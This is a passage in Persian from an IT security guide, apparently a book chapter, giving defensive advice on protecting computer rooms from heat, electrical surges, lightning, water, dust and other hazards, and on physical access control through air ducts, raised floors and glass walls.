ﻭﻗﺘﻲ ﻣﺸﺨﺺ ﻛﺮﺩﻳﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﭼﻪ ﻣﺤﺪﻭﺩﺓ ﺩﻣﺎﻳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻧﻮﺳﺎﻥ ﺑﺎﺷﻨﺪ ،ﺁﻥ ﺩﻣﺎﻫﺎ ﺭﺍ ﺑﺮﺁﻭﺭﻳﺪ .ﺑـﻪ ﺣـﺮﺍﺭﺕﮔﻴﺮﻫـﺎ ﻭ ﺍﻟﮕـﻮﻱ
ﺟﺮﻳﺎﻥ ﻫﻮﺍﻱ ﺩﺳﺘﮕﺎﻩﻫﺎﻳﺘﺎﻥ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﻛﻨﻴﺪ .ﺍﺯ ﺁﮊﻳﺮﻫﺎﻱ ﺩﻣﺎ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﭘﺎﺭﺍﺯﻳﺖﻫﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ
ﻣﻮﺗﻮﺭﻫﺎ ،ﭘﻨﻜﻪﻫﺎ ،ﺗﺠﻬﻴﺰﺍﺕ ﺳﻨﮕﻴﻦ ،ﻭ ﺣﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ،ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧـﺪ ﻣﻮﺟـﺐ ﺑـﺮﻭﺯ ﻣـﺴﺎﻳﻞ
ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺷﻮﺩ .ﺍﻳﻦ ﭘﺎﺭﺍﺯﻳﺘﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻓﻀﺎ ﻳﺎ ﻛﺎﺑﻠﻬﺎﻱ ﺍﻧﺘﻘﺎﻝ ﺑـﺮﻕ ﻧﺰﺩﻳـﻚ ﻣﺤﻠﺘـﺎﻥ
ﻣﻨﺘﻘﻞ ﺷﻮﻧﺪ.
ﺍﻣﻮﺍﺝ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻧﻮﻉ ﺧﺎﺻﻲ ﺍﺯ ﭘﺎﺭﺍﺯﻳﺘﻬﺎﻱ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺷﺎﻣﻞ ﻳﻚ ﻳﺎ ﭼﻨﺪ ﭘﺎﻟﺲ ﻭﻟﺘﺎﮊ ﺑﺎﻻ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ ﻫﺮ
ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻳﻚ ﻣﺪﺍﺭ ﺍﻟﻜﺘﺮﻳﻜﻲ ﻣﺠﺰﺍ ﻭ ﻳﻚ ﺳﻴﻢ ﺯﻣﻴﻦ ﺑﺎ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺻﺎﻓﻲ ﻗﺪﺭﺕ ﺍﻳﺰﻭﻟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺗﺤﺖ ﻫﻴﭻ ﺷﺮﺍﻳﻄﻲ
ﻲ ﺳﻨﮕﻴﻦ ﻣﺪﺍﺭ ﺍﺷﺘﺮﻛﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺭﺳﺎﻧﺎﻫﺎﻱ ﺭﺍﺩﻳﻮﻳﻲ )ﺍﺯ ﺟﻤﻠﻪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﺎﺭ( ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﻭﺭ ﻧﮕﻪ ﺩﺍﺷﺘﻪ ﺷﻮﻧﺪ.
ﻧﺒﺎﻳﺪ ﺑﺎ ﻭﺳﺎﻳﻞ ﺑﺮﻗ ﹺ
ﺻﺎﻋﻘﻪ
ﺻﺎﻋﻘﻪ ﺍﻣﻮﺍﺝ ﺑﺰﺭﮒ ﺑﺮﻕ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛﻪ ﻭﺳﺎﻳﻞ ﺣﻔﺎﻇﺖ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺩﺍﺭﻧﺪ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ .ﺍﮔﺮ ﺻـﺎﻋﻘﻪ ﺑـﻪ
ﺍﺳﻜﻠﺖ ﻓﻠﺰﻱ ﺳﺎﺧﺘﻤﺎﻥ ﺷﻤﺎ ﺍﺻﺎﺑﺖ ﻛﻨﺪ )ﻳﺎ ﺑﻪ ﺑﺮﻕﮔﻴﺮ ﺁﻥ ﺑﺮﺧﻮﺭﺩ ﻧﻤﺎﻳﺪ( ،ﺟﺮﻳﺎﻥ ﺣﺎﺻﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﻣﻴﺪﺍﻥ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﻗـﻮﻱ ﺩﺭ ﻣـﺴﻴﺮ
Smoke Detector
55
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٢٨٣
ﺧﻮﺩ ﺗﺎ ﺯﻣﻴﻦ ﺍﻳﺠﺎﺩ ﻛﻨﺪ .ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﻳﺪ ﺩﺭ ﺧﻼﻝ ﻃﻮﻓﺎﻧﻬﺎﻱ ﺻﺎﻋﻘﻪﺍﻱ ﺍﺯ ﭘﺮﻳﺰ ﺑﺮﻕ ﺑﻴﺮﻭﻥ ﻛـﺸﻴﺪﻩ ﺷـﻮﻧﺪ؛ ﺍﮔـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﻧﻴﺴﺖ ﺍﺯ ﺗﺠﻬﻴﺰﺍﺕ ﺑﺎﺯﺩﺍﺭﻧﺪﺓ ﺍﻣﻮﺍﺝ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﮔﺮﭼﻪ ﺍﻳﻦ ﻭﺳﺎﻳﻞ ﺩﺭ ﻣﻘﺎﺑﻞ ﺑﺮﺧﻮﺭﺩ ﻣﺴﺘﻘﻴﻢ ﺩﺳﺘﮕﺎﻩ ﺭﺍ ﺣﻔﺎﻇﺖ ﻧﺨﻮﺍﻫﻨـﺪ ﻛـﺮﺩ ،ﻭﻟـﻲ
ﻭﻗﺘﻲ ﻃﻮﻓﺎﻧﻬﺎ ﺩﻭﺭ ﺑﺎﺷﻨﺪ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﻭﺍﺳﻄﻪﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺳﺎﺯﺓ ﻓﻠـﺰﻱ ﺳـﺎﺧﺘﻤﺎﻥ ﺩﻭﺭ ﻧﮕـﺎﻩ ﺩﺍﺷـﺘﻪ ﺷـﻮﻧﺪ.
ﻫﻴﭽﮕﺎﻩ ﺑﻴﺮﻭﻥ ﺳﺎﺧﺘﻤﺎﻥ ﺍﺯ ﻛﺎﺑﻞ ﻣﺴﻲ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ ،ﻣﮕﺮ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻓﻠﺰﻱ.
ﺁﺏ
ﺁﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻧﺎﺑﻮﺩ ﻛﻨﺪ .ﺍﻭﻟﻴﻦ ﺧﻄﺮ ﺍﺗﺼﺎﻝ ﻛﻮﺗﺎﻩ ﺍﻟﻜﺘﺮﻳﻜﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭﺻﻮﺭﺗﻲ ﭘﻴﺶ ﺧﻮﺍﻫـﺪ ﺁﻣـﺪ ﻛـﻪ ﺁﺏ ﻣﻴـﺎﻥ ﺧﻄـﻮﻁ
ﺣﺎﻭﻱ ﻭﻟﺘﺎﮊ ﻭ ﻳﻚ ﺧﻂ ﺍﻧﺘﻘﺎﻝ ﺯﻣﻴﻦ ﺻﻔﺤﺔ ﻣﺪﺍﺭ ،ﺍﺗﺼﺎﻝ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ.
ﻻ ﺍﺯ ﺑﺎﺭﺍﻥ ﻳﺎ ﺳﻴﻞ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻛﻪ ﺍﺯ ﮐﻨﺘﺮﻝ ﺧﺎﺭﺝ ﻣﻲﺷﻮﻧﺪ ﺟﺎﺭﻱ ﻣﻲﮔـﺮﺩﺩ .ﺁﺏ ﻫﻤﭽﻨـﻴﻦ
ﺁﺏ ﻣﻌﻤﻮ ﹰ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺟﺎﻫﺎﻱ ﻋﺠﻴﺐ ﻭ ﻏﺮﻳﺐ ﻣﺎﻧﻨﺪ ﺳﺮﺭﻳﺰ ﺩﺳﺘﺸﻮﺋﻲﻫﺎ ﺩﺭ ﻃﺒﻘﺎﺕ ﺑﺎﻻﺗﺮ ،ﻳﺎ ﺑﺮ ﺍﺛﺮ ﺧﺮﺍﺑﻜﺎﺭﻱﻫﺎ ،ﻭ ﻳﺎ ﺍﺯ ﺩﭘﺎﺭﺗﻤﺎﻥ ﺁﺗﺶﻧـﺸﺎﻧﻲ
ﺟﺮﻳﺎﻥ ﭘﻴﺪﺍ ﻛﻨﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺍﺯ ﻃﺒﻘﺎﺕ ﺯﻳﺮﺯﻣﻴﻦ ﻛﻪ ﺩﺭ ﻣﻌﺮﺽ ﺳﻴﻼﺏ ﻫﺴﺘﻨﺪ ﺑﻴﺮﻭﻥ ﺁﻭﺭﻳﺪ .ﺣﺴﮕﺮﻫﺎﻱ ﺁﺏ ﺭﺍ ﺭﻭﻱ ﺯﻣﻴﻦ ﻃﺒﻘﻪﺍﻱ ﻛﻪ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﺩﺭ ﺁﻥ ﻫﺴﺖ ﻭ ﻫﻤﭽﻨﻴﻦ ﺯﻳﺮ ﻃﺒﻘﺎﺕ ﭘﻠﻪﺍﻱ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻗﻄﻊ ﺍﺗﻮﻣﺎﺗﻴﻚ ﺑﺮﻕ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺳﻴﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﻏﺬﺍ ﻭ ﻧﻮﺷﻴﺪﻧﻲﻫﺎ
ﻏﺬﺍﻫﺎ ﺑﻮﻳﮋﻩ ﻏﺬﺍﻫﺎﻱ ﭼﺮﺏ ﺑﻪ ﺍﻧﮕﺸﺘﺎﻥ ﺍﻓﺮﺍﺩ ﻣﻲﭼﺴﺒﻨﺪ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ ﻫﺮﭼﻪ ﻛﻪ ﻓﺮﺩ ﺑﻪ ﺁﻥ ﺩﺳﺖ ﻣﻲﺯﻧﺪ ﻣﻨﺘﻘﻞ ﻣـﻲﺷـﻮﻧﺪ .ﺍﻳـﻦ ﺍﺗﻔـﺎﻕ
ﻏﺎﻟﺒﹰﺎ ﺳﻄﻮﺡ ﺣﺴﺎﺱ ﻧﺴﺒﺖ ﺑﻪ ﻛﺜﻴﻔﻲ ﻣﺎﻧﻨﺪ ﻧﻮﺍﺭﻫﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﺩﻳﺴﻜﻬﺎﻱ ﻧﻮﺭﻱ ﺭﺍ ﻧﻴﺰ ﺷﺎﻣﻞ ﻣﻲﺷﻮﺩ .ﻳﻜﻲ ﺍﺯ ﺳﺮﻳﻌﺘﺮﻳﻦ ﺭﻭﺷـﻬﺎﻱ
ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﻳﻚ ﺻﻔﺤﻪ ﻛﻠﻴﺪ ﺭﻭﻣﻴﺰﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﻧﻮﺷﻴﺪﻧﻲ ﻏﻴﺮ ﺍﻟﻜﻠﻲ ﻳﺎ ﻳﻚ ﻓﻨﺠﺎﻥ ﻗﻬﻮﻩ ﺭﻭﻱ ﺩﻛﻤﻪﻫﺎﻱ ﺁﻥ ﺭﻳﺨﺘﻪ ﺷـﻮﺩ.
٥٦
ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻗﺎﻋﺪﻩ ﺍﻳﻤﻦﺗﺮﻳﻦ ﻫﻢ ﻫﺴﺖ :ﻫﻤﺔ ﻏﺬﺍﻫﺎ ﻭ ﻧﻮﺷﺎﺑﻪﻫﺎ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺩﻭﺭ ﻧﮕﻬﺪﺍﺭﻳﺪ.
ﺳﺎﻳﺮ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ
ﻛﻨﺘﺮﻝ ﻣﺤﻴﻄﻲ
ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ ﻧﺎﺧﻮﺍﺳﺘﻪ ،ﺑﻪ ﻃﻮﺭ ﻣﺪﺍﻭﻡ ﺩﻣﺎ ﻭ ﺭﻃﻮﺑﺖ ﻧﺴﺒﻲ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﻧﻈﺎﺭﺕ ﻭ ﺛﺒﺖ ﻛﻨﻴﺪ .ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻗﺎﻋﺪﻩ ﻛﻠﻲ ،ﻫـﺮ
۱۰۰۰ﻓﻮﺕ ﻣﺮﺑﻊ ﺍﺯ ﻓﻀﺎﻱ ﺍﺩﺍﺭﻱ ﺑﺎﻳﺪ ﺗﺠﻬﻴﺰﺍﺕ ﺛﺒﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩﺵ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺁﻧﭽﻪ ﺛﺒﺖ ﻛﺮﺩﻩﺍﻳﺪ ﺭﺍ ﺩﺭ ﺑـﺎﺯﻩﻫـﺎﻱ ﺯﻣـﺎﻧﻲ
ﻣﻨﻈﻢ ﺑﺮﺭﺳﻲ ﻭ ﮔﺰﺍﺭﺵ ﻛﻨﻴﺪ.
٥٦
ﺍﻳﻦ ﻗﺎﻋﺪﻩ ﺷﺎﻳﺪ ﺑﻴﺶ ﺍﺯ ﻫﺮ ﻗﺎﻋﺪﻩﺍﻱ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﻏﺎﻟﺒﹰﺎ ﻫﻢ ﻧﻘﺾ ﻣﻲﺷﻮﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺧﻄﺮﺍﺕ ﻣﺤﻴﻄﻲ ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﻨﺪ:
• ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ -ﺗﺎ ﺁﻧﺠﺎ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻟﻨﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺍﺯ ﮔﺮﺩ ﻭ ﻏﺒﺎﺭ ﺗﻤﻴﺰ ﻧﮕﻪ ﺩﺍﺭﻳﺪ ،ﻭ ﺍﺯ ﻳﻚ ﺟﺎﺭﻭ ﺑﺮﻗـﻲ ﻣﺨـﺼﻮﺹ
ﻛﺎﻣﭙﻴﻮﺗﺮ ﺑﺎ ﺻﺎﻓﻲ ﺑﺴﻴﺎﺭ ﺭﻳﺰ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻨﻈﻢ ﺯﻣﺎﻧﻲ ﺑﺮﺍﻱ ﺗﻤﻴﺰﻛﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
• ﺍﻧﻔﺠﺎﺭ -ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﻫﺴﺘﻴﺪ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻴﻄﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺧﻄﺮ ﺍﻧﻔﺠﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺑﺎﻳﺪ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠـﺎﺭ ﺭﺍ
ﺑﮑﺎﺭ ﺑﺮﻳﺪ .ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭ ﻣﺤﻔﻈﻪﻫﺎﻱ ﺿﺪ ﺍﻧﻔﺠﺎﺭ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃﻪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ.
• ﺣﺸﺮﺍﺕ -ﺑﺮﺍﻱ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺗﻌﺪﺍﺩ ﺣﺸﺮﺍﺕ ﺩﺭ ﺳﺎﻟﻦ ﺭﺍﻳﺎﻧﻪﺗﺎﻥ ﺍﻗﺪﺍﻣﺎﺕ ﻣﺆﺛﺮ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ.
• ﻟﺮﺯﺵ -ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﻟﺮﺯﺵ ﺯﻳﺎﺩ ،ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﺯﻳﺮﺍﻧﺪﺍﺯ ﻻﺳﺘﻴﻜﻲ ﻳﺎ ﻧﺮﻡ ﻗﺮﺍﺭﺩﻫﻴﺪ ،ﻃﻮﺭﻱ ﻛﻪ ﺩﺭﻳﭽـﻪﻫـﺎﻱ ﺗﻬﻮﻳـﺔ
ﻫﻮﺍ ﻣﺴﺪﻭﺩ ﻧﺸﺪﻩ ﺑﺎﺷﻨﺪ.
• ﺭﻃﻮﺑﺖ -ﺭﻃﻮﺑﺖ ﻣﺤﻴﻂ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩﻩ ﻭ ﺩﺭ ﺳﻄﺢ ﻣﻨﺎﺳﺒﻲ ﻧﮕﺎﻩ ﺩﺍﺭﻳﺪ.
٢٨٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ
ﻗﻮﺓ ﺗﺸﺨﻴﺺ ﺑﻪ ﺷﻤﺎ ﺣﻜﻢ ﻣﻲﻛﻨﺪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻧﮕﻬﺪﺍﺭﻳﺪ؛ ﺍﻣﺎ ﺍﻳﻦ ﺍﺗﺎﻕ ﭼﻪ ﻗﺪﺭ ﺍﻳﻤﻦ ﺍﺳﺖ؟ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﺗﺎﻗﻲ
ﻼ ﻧﺎﺍﻣﻦ ﺍﺳﺖ.
ﻛﻪ ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻤﻦ ﺍﺳﺖ ﺩﺭ ﻭﺍﻗﻊ ﻛﺎﻣ ﹰ
ﻛﻒﻫﺎﻱ ﭘﻠﻪﺍﻱ ﻭ ﺳﻘﻒﻫﺎﻱ ﻛﻮﺗﺎﻩ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎﻱ ﺍﺩﺍﺭﻱ ﻣﺪﺭﻥ ،ﺩﻳﻮﺍﺭﻫﺎﻱ ﺩﺍﺧﻠﻲ ﺍﺗﺎﻕ ﺗﺎ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎ ﻭ ﺯﻳﺮ ﻛﻔﻬـﺎ ﻧﻤـﻲﺭﺳـﻨﺪ .ﺍﻳـﻦ ﻧـﻮﻉ ﺳـﺎﺧﺘﻤﺎﻥﺳـﺎﺯﻱ
ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﺍﺗﺎﻗﻬﺎ ﻭ ﺩﻓﺎﺗﺮ ﻣﺠﺎﻭﺭ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ.
ﻭﺭﻭﺩ ﺍﺯ ﻃﺮﻳﻖ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍ
ﺍﮔﺮ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻫﻮﺍﻳﻲ ﻛﻪ ﺑﻪ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻫﻮﺍ ﻣﻲﺭﺳﺎﻧﺪ ﺑﻪ ﺍﻧﺪﺍﺯﻩ ﻛﺎﻓﻲ ﺑﺰﺭﮒ ﺑﺎﺷﻨﺪ ،ﻣﻬﺎﺟﻤﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﻣﺤﻮﻃﺔ
ﻫﺮﭼﻨﺪ ﺍﻳﻤﻦ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺗﻬﻮﻳﺔ ﺯﻳﺎﺩ ﻫﻮﺍ ﺩﺍﺭﻧﺪ ﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪ ﻛﺎﻧﺎﻝ ﻛﻮﭼﻚ ﻳﺎ ﻳﻚ ﻛﺎﻧﺎﻝ ﺑـﺰﺭﮒ ﻛـﻪ ﺩﺍﺭﺍﻱ
ﺗﻮﺭﻱﻫﺎﻱ ﺟﻮﺵ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﺩﺭﻳﭽﻪﻫﺎﻱ ﻫﻮﺍ ﻳﺎ ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﻣﻲﺑﺎﺷﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﻳﻚ ﻣﺤﻴﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺧﻴﻠﻲ ﺯﻳﺎﺩ ،ﻣﻲﺗـﻮﺍﻥ ﺩﺭ
ﺩﺍﺧﻞ ﻛﺎﻧﺎﻟﻬﺎ ﺍﺯ ﺁﺷﻜﺎﺭﺳﺎﺯﻫﺎﻱ ﺣﺮﻛﺘﻲ ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ.
ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ
ﻻ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺟﻠﻮﻩ ﻣﻌﻤﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ،ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻄﺮﺍﺕ ﺟـﺪﻱ ﺍﻣﻨﻴﺘـﻲ
ﮔﺮﭼﻪ ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﻭ ﭘﻨﺠﺮﻩﻫﺎﻱ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ
ﺑﺎﺷﻨﺪ .ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺑﻪ ﺭﺍﺣﺘﻲ ﺷﻜﺴﺘﻪ ﻣﻲﺷﻮﻧﺪ؛ ﻳﻚ ﺁﺟﺮ ﺑﺎ ﻳﻚ ﺑﻄﺮﻱ ﺑﻨﺰﻳﻦ ﻛـﻪ ﺑـﻪ ﻃـﺮﻑ ﭘﻨﺠـﺮﻩ ﭘﺮﺗـﺎﺏ ﺷـﻮﺩ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺧﺮﺍﺑﻴﻬﺎﻱ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪﺍﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ .ﻳﻚ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺳﺎﺩﮔﻲ ﺍﺯ ﻃﺮﻳﻖ ﺗﻤﺎﺷﺎﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﻳﻮﺍﺭ ﺷﻴﺸﻪﺍﻱ ﻳﺎ
ﭘﻨﺠﺮﻩ ﻫﺴﺘﻨﺪ ﺍﻃﻼﻋﺎﺗﻲ ﺣﻴﺎﺗﻲ ﻣﺎﻧﻨﺪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻳﺎ ﺍﻃﻼﻋﺎﺗﻲ ﺭﺍﺟﻊ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺳﻴﺴﺘﻢ ﻛﺴﺐ ﻛﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺘـﻮﺍﻥ
ﺍﻃﻼﻋﺎﺕ ﭘﺸﺖ ﻳﻚ ﺻﻔﺤﺔ ﻣﺎﺕ ﺭﺍ ﺑﺎ ﺗﺤﻠﻴﻞ ﺍﻣﻮﺍﺝ ﻧﻮﺭ ﺑﺎﺯﺗﺎﺑﻲ ﺁﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺩﻳﻮﺍﺭﻫﺎﻱ ﺷﻴﺸﻪﺍﻱ ﺩﺍﺧﻠـﻲ ﺑـﺮﺍﻱ ﺍﺗﺎﻗﻬـﺎﻳﻲ ﻛـﻪ ﺑﺎﻳـﺪ
ﺣﻔﺎﻇﺖ ﺷﻮﻧﺪ ﺍﻣﺎ ﻧﮕﻬﺒﺎﻥ ﻣﺠﺎﺯ ﺑﻪ ﻭﺭﻭﺩ ﻧﻤﻲﺑﺎﺷﺪ ﺧﻮﺏ ﻫﺴﺘﻨﺪ؛ ﺍﻣﺎ ﺩﺭ ﺗﻤﺎﻡ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺑﺎﻳﺪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ.
ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﺨﺮﻳﺐ
